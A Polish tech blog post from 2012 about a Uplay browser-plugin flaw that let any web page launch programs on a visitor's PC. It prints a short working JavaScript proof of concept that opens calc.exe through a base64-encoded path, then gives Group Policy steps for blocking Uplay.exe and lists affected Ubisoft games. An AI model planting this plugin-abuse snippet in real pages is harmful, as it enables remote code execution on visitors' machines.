Dzięki Uplay można przejąć kontrolę nad Twoim komputerem z dowolnej strony [AKTUALIZACJA ::2]

Grasz w gry firmy Ubisoft i masz zainstalowany program Uplay? Nie czytaj tego wstępu, tylko od razu przejdź dalej, ponieważ możesz mieć ciekawe przygody.

Wczoraj w Internecie aż zahuczało od wiadomości, że poprzez klienta Uplay można uzyskać dostęp do komputera ofiary z dowolnej strony www. Nie trzeba być również jakimś wielkim specjalistą. Wystarczy kilka linijek kody, aby dopalić kalkulator.

x = document.createElement('OBJECT');
x.type = "application/x-uplaypc";
document.body.appendChild(x);
x.open("-orbit_product_id 1 -orbit_exe_path
QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ== -uplay_steam_mode -uplay_dev_mode
-uplay_dev_mode_auto_play")
$ printf "C:\\WINDOWS\\SYSTEM32\\CALC.EXE" | base64
QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ==

Jeżeli chcesz sprawdzić, czy jesteś podatny na atak, kliknij w ten link. Jeżeli uruchomi Ci się kalkulator, to koniecznie czytaj dalej ten artykuł ;-).

Jak się zabezpieczyć?

Większość serwisów mówi o podatności, lecz żaden z nich nie podaje sposobu zabezpieczenia się. Ja oczywiście jestem inny i powiem co zrobić, aby czuć się bezpiecznie. Najlepiej jest po prostu zablokować aplikację do czasu, aby Ubisoft wypuści łatkę. Jak to zrobić.

Przepis działa pod systemem Windows Vista oraz Windows 7 z grupy wyżej niż Professional. Jeżeli masz edycję Starter lub Home, kliknij tutaj.

Naciskamy skrót klawiszowy logo Windows + R i w polu wpisujemy gpedit.msc

W nowym oknie rozwijamy:

Konfiguracja użytkownika

Szablony administracyjne

System

i po prawej stronie szukamy Nie uruchamiaj określonych aplikacji systemu Windows.

Klikamy na to dwukrotnie. W nowym oknie pierwsze co robimy to włączamy opcje, a gdy już to zrobimy, klikamy na przycisk Pokaż:

Tutaj wpisujemy aplikacje, które mają być blokowane. Klikamy więc dwukrotnie na pole i wpisujemy
Uplay.exe

Klikamy na OK i w pierwszym oknie, które nam się pojawiło również na OK. Teraz spróbujmy uruchomić aplikację Uplay. Powinien pojawić nam się taki komunikat:

Czyli wszystko działa. Teraz jak wejdziemy na stronę, na której znajduje się złośliwy kod, to nic nam się nie stanie.

P.S Tutaj jeszcze podaję tytuły, które wypuścił Ubisoft i których dotyczy ta podatność:

Assassin’s Creed II
Assassin’s Creed: Brotherhood
Assassin’s Creed: Project Legacy
Assassin’s Creed Revelations
Assassin’s Creed III
Beowulf: The Game
Brothers in Arms: Furious 4
Call of Juarez: The Cartel
Driver: San Francisco
Heroes of Might and Magic VI
Just Dance 3
Prince of Persia: The Forgotten Sands
Pure Football
R.U.S.E.
Shaun White Skateboarding
Silent Hunter 5: Battle of the Atlantic
The Settlers 7: Paths to a Kingdom
Tom Clancy’s H.A.W.X. 2
Tom Clancy’s Ghost Recon: Future Soldier
Tom Clancy’s Splinter Cell: Conviction
Your Shape: Fitness Evolved


Aktualizacja [31.07.2012 16:21]

Wyszła przymusowa aktualizacja do klienta Uplay instalowana podczas uruchomienia programu. Aby uruchomić aplikację, musimy ją usunąć z listy zablokowanych programów, a najlepiej wyłączyć całą tą opcję. Na tym etapie, jaki przedstawia screen:

Zaznaczamy opcję Nie skonfigurowane lub Wyłączone i klikamy na Ok. Po wykonaniu tej czynności Uplay uruchomi się bez problemów.


Aktualizacja [01.08.2012 13:40]

Powyższa porada działa tylko na systemach z grupy Professional i wyżej. Jeżeli masz edycję Starter lub Home, kliknij tutaj.